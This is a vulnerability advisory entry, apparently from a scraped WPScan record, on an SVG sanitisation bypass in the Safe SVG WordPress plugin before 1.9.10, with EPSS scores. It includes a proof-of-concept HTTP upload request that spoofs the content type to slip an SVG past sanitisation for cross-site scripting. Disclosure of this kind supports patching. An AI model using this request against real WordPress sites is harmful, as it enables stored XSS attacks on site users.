Lucene search

K
wpvulndbDavid HamannWPVDB-ID:4D12533E-BDB7-411F-BCDF-4C5046DB13F3
HistoryMar 25, 2022 - 12:00 a.m.

Safe SVG < 1.9.10 - SVG Sanitisation Bypass

2022-03-2500:00:00
David Hamann
wpscan.com
5

0.001 Low

EPSS

Percentile

36.9%

The sanitisation step of the plugin can be bypassed by spoofing the content-type in the POST request to upload a file. Exploiting this vulnerability, an attacker will be able to perform the kinds of attacks that this plugin should prevent (mainly XSS, but depending on further use of uploaded SVG files potentially other XML attacks).

PoC

POST /wp-admin/async-upload.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174 Content-Length: 947 Connection: close Cookie: [user with upload capability] -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“name” xss.svg -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“action” upload-attachment -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“_wpnonce” b281e72731 -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“async-upload”; filename=“xss.svg” Content-Type: image/png -----------------------------27451310545300823063986174174–

CPENameOperatorVersion
safe-svglt1.9.10

0.001 Low

EPSS

Percentile

36.9%

Related for WPVDB-ID:4D12533E-BDB7-411F-BCDF-4C5046DB13F3